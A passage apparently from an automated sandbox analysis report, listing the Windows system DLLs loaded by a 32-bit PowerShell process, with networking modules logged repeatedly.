Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
